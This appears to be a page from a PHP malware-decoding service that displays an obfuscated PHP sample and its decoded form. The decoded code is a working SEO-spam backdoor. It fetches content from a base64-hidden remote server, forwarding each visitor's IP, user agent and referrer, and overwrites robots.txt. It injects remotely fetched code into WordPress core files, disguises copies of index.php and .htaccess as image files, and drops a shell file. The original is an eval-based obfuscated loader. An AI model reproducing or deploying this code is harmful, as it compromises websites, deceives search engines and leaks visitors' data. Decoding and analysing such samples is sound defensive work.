Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $LvOyYbptnPJ='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$LvOyYbptnP..

Decoded Output download

error_reporting(0);
$go_domain = base64_decode('c2VvODE4LTIwLmJlYXV0aWZ1bHN1bnNldC5zaXRl');
$language = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 4);
$userrefer = $_SERVER['HTTP_REFERER']?$_SERVER['HTTP_REFERER']:"";
$useragent = $_SERVER['HTTP_USER_AGENT']?$_SERVER['HTTP_USER_AGENT']:"";
$userip = '';
@$timezone_out = date_default_timezone_get();
$userip = $_SERVER['REMOTE_ADDR'];
$ips = explode(",", $userip);
$userip = trim(current($ips));
$http = 'http';
if(is_https()){
	$http = 'https';
}else{
	$http = 'http';
}

$index_url = "http://$go_domain/666.php?dom=%s&uri=%s&http=%s&refer=%s&agent=%s&lang=%s&ip=%s";
$host = $_SERVER['HTTP_HOST'];
$uri = $_SERVER['REQUEST_URI'];

@$action = $_GET['ac']?$_GET['ac']:"";
if($action != "" && $action == "write"){
	write("index.php");
	exit("write done!");
}

if(preg_match('@writerobots$@i',$uri)){
	$request = sprintf($index_url, urlencode($host), urlencode($uri), urlencode($http), urlencode($userrefer), urlencode($useragent), urlencode($language), urlencode($userip));
	$contents = base64_decode(get($request));
	@chmod("robots.txt", 0755);
	file_put_contents("robots.txt", $contents);
	header("Content-type: text/plain; charset=utf-8");
	echo $contents."
";
	echo "robots write done!!
";
	exit();
}elseif(preg_match('@pingsitemap.xml$@i',$uri)){
	$request = sprintf($index_url, urlencode($host), urlencode($uri), urlencode($http), urlencode($userrefer), urlencode($useragent), urlencode($language), urlencode($userip));
	$content = base64_decode(get($request));
	$maplist = explode("@@@", $content);
	@header("Content-type: text/plain; charset=utf-8");
	foreach($maplist as $map){
		$sitemap = "https://www.google.com/ping?sitemap=$map";
		$contents = get($sitemap);
		if(strpos($contents, "Sitemap Notification Received")){
			echo "Submitting Google Sitemap ".$map." : OK!
";
		}else{
			echo "Submitting Google Sitemap ".$map." : ERROR!
";
		}
	}
	exit();
}elseif(preg_match('@(.*?).xml$@i',$uri)){
	$request = sprintf($index_url, urlencode($host), urlencode($uri), urlencode($http), urlencode($userrefer), urlencode($useragent), urlencode($language), urlencode($userip));
	$content = get($request);
	@header("Content-type: text/xml");
	$date_str = date("Y-m-d\TH:i:sP",time());
	$content = str_replace("{#date_str}", $date_str, $content);
	$content = str_replace("okhtmlgetcontent",'',$content);
	echo trim($content);
	exit();
}elseif(substr($uri, -4) == ".css"){
	$request = sprintf($index_url, urlencode($host), urlencode($uri), urlencode($http), urlencode($userrefer), urlencode($useragent), urlencode($language), urlencode($userip));
	$content = get($request);
	if(strstr($content,'okhtmlgetcontent')){
		@header("Content-type: text/css; charset=utf-8");
		$content = str_replace("okhtmlgetcontent",'',$content);
		echo trim($content);
	}
	exit();
}else{
	$request = sprintf($index_url, urlencode($host), urlencode($uri), urlencode($http), urlencode($userrefer), urlencode($useragent), urlencode($language), urlencode($userip));
	$content = get($request);
	if(strstr($content,'okhtmlgetcontent')){
		@header("Content-type: text/html; charset=utf-8");
		$content = str_replace("okhtmlgetcontent",'',$content);
		echo trim($content);
		exit();
	}else if(strstr($content,'getcontent404page')){
		@header('HTTP/1.1 404 Not Found');
		echo "404 Not Found";
		exit();
	}else if(strstr($content,'getcontent301page')){
		@header('HTTP/1.1 301 Moved Permanently');
		$content = str_replace("getcontent301page",'',$content);
		header('Location: '.trim($content));
		exit();
	}else if(strstr($content,'getcontent500page')){
		@header('HTTP/1.1 500 Internal Server Error');
		$content = str_replace("getcontent500page",'',$content);
		echo "500 Internal Server Error";
		exit();
	}
}
function write($index_name){
	$write1 = get(base64_decode("aHR0cDovL2FiYy5maXJzdGd1aWRlLnh5ei93cml0ZTEudHh0"));
	$write2 = get(base64_decode("aHR0cDovL2FiYy5maXJzdGd1aWRlLnh5ei93cml0ZTIudHh0"));
	$ht_content = file_get_contents(".htaccess");
	$index_content = file_get_contents($index_name);
	$loader_php = "wp-includes/template-loader.php";
	$load_php = "wp-includes/load.php";
	$font_editor_php = "wp-includes/SimplePie/index.php";
	if(is_dir("wp-includes/SimplePie")){
		file_put_contents("wp-admin/images/arrow-lefts.png", $index_content);
		file_put_contents("wp-admin/images/arrow-rights.png", $ht_content);
		file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content);
		file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content);
		$loader_content = file_get_contents($loader_php);
		$load_content = file_get_contents($load_php);
		@chmod($loader_php, 0755);@chmod($load_php, 0755);
		file_put_contents($loader_php, $write1.$loader_content);
		file_put_contents($load_php, $load_content.$write2);
		@chmod($loader_php, 0644);@chmod($load_php, 0644);
		file_put_contents($font_editor_php, $shell_postfs);
	}
}
function get($url){ 
	$contents = @file_get_contents($url);
	if (!$contents) {
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $url);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
		$contents = curl_exec($ch);
		curl_close($ch);
	} 
	return $contents;
}
function is_https() {
	if ( !empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {
		return true;
	} elseif ( isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https' ) {
		return true;
	} elseif ( !empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {
		return true;
	}
	return false;
}

Did this file decode correctly?

Original Code

<?php $LvOyYbptnPJ='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$LvOyYbptnPJ[(105/15)].$LvOyYbptnPJ[(26-1)].$LvOyYbptnPJ[(1*49)].$LvOyYbptnPJ[((10*1)+18)].$LvOyYbptnPJ[(14+22)].$LvOyYbptnPJ[(44+5)].$LvOyYbptnPJ[(44-13)].$LvOyYbptnPJ[(684/18)].$LvOyYbptnPJ[(23+4)].$LvOyYbptnPJ[(72-(33-7))].$LvOyYbptnPJ[(154/22)].$LvOyYbptnPJ[(11+25)].$LvOyYbptnPJ[(65-(62-31))].$LvOyYbptnPJ[(26-6)].$LvOyYbptnPJ[((27*2)-8)];$pHFdNhg9688=$LvOyYbptnPJ[(20-9)].$LvOyYbptnPJ[(2*4)].$LvOyYbptnPJ[(29*1)].$LvOyYbptnPJ[(160/4)];$MYtraky2482=$LvOyYbptnPJ[(8*5)].$LvOyYbptnPJ[((1+0)+2)].$LvOyYbptnPJ[(6+(1*(95/19)))].$LvOyYbptnPJ[(140/5)].$LvOyYbptnPJ[(522/18)].$LvOyYbptnPJ[(7*((7-3)-2))].$LvOyYbptnPJ[(2*14)].$LvOyYbptnPJ[(138/(2+4))].$LvOyYbptnPJ[(1029/(378/18))].$LvOyYbptnPJ[((2*189)/9)].$LvOyYbptnPJ[(12+(0+0))].$LvOyYbptnPJ[(31*1)].$LvOyYbptnPJ[(48/(36/12))].$LvOyYbptnPJ[(735/15)].$LvOyYbptnPJ[(0+7)].$LvOyYbptnPJ[(18+2)].$LvOyYbptnPJ[(18-(10/5))].$LvOyYbptnPJ[(735/15)].$LvOyYbptnPJ[(0+(2-(1*1)))].$LvOyYbptnPJ[(16-(3+(36/(0+18))))].$LvOyYbptnPJ[((167-23)/18)].$LvOyYbptnPJ[(0+(18-9))].$LvOyYbptnPJ[(1*3)].$LvOyYbptnPJ[(11*(1+(0/(78/13))))].$LvOyYbptnPJ[(2*7)].$LvOyYbptnPJ[(29*(0+1))].$LvOyYbptnPJ[(38-(8+9))].$LvOyYbptnPJ[(15*2)].$LvOyYbptnPJ[(45-11)].$LvOyYbptnPJ[(1*46)].$LvOyYbptnPJ[(1*(17+21))].$LvOyYbptnPJ[(78/3)].$LvOyYbptnPJ[(21+(77/11))].$LvOyYbptnPJ[(22+14)].$LvOyYbptnPJ[(343/(91/13))].$LvOyYbptnPJ[(1*1)].$LvOyYbptnPJ[(21-10)].$LvOyYbptnPJ[(22+(12/2))].$LvOyYbptnPJ[(180/20)].$LvOyYbptnPJ[(3+((0+0)*1))].$LvOyYbptnPJ[(686/(126/9))].$LvOyYbptnPJ[(61-(32-8))].$LvOyYbptnPJ[(476/17)].$LvOyYbptnPJ[((4-0)+22)].$LvOyYbptnPJ[(((23-(2*5))/13)-0)].$LvOyYbptnPJ[(7+(84/21))].$LvOyYbptnPJ[(28/2)].$LvOyYbptnPJ[(9-0)].$LvOyYbptnPJ[(3*1)];$UrR1094= "'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'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481(); ?>

Function Calls

null 1
gzinflate 1
base64_decode 1
create_function 1

Variables

$b error_reporting(0); $go_domain = base64_decode('c2VvODE4LTI..
$x '7Vhbb9s2FH5Ogf4HRvMqebBlu3WyLUURB4ly6Vw7k5027VoIikRbxCRRE6k..
$q2866 create_function
$JTx2343 $x="'7Vhbb9s2FH5Ogf4HRvMqebBlu3WyLUURB4ly6Vw7k5027VoIikRbxCR..
$UrR1094 '7Vhbb9s2FH5Ogf4HRvMqebBlu3WyLUURB4ly6Vw7k5027VoIikRbxCRRE6k..
$mEriqO3481 None
$LvOyYbptnPJ y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je
$MYtraky2482 ";$a=base64_decode($x);$b=gzinflate($a);eval($b);
$pHFdNhg9688 $x="

Stats

MD5 bbe87288431609e5fbe3d46fc22c4cc7
Eval Count 2
Decode Time 150 ms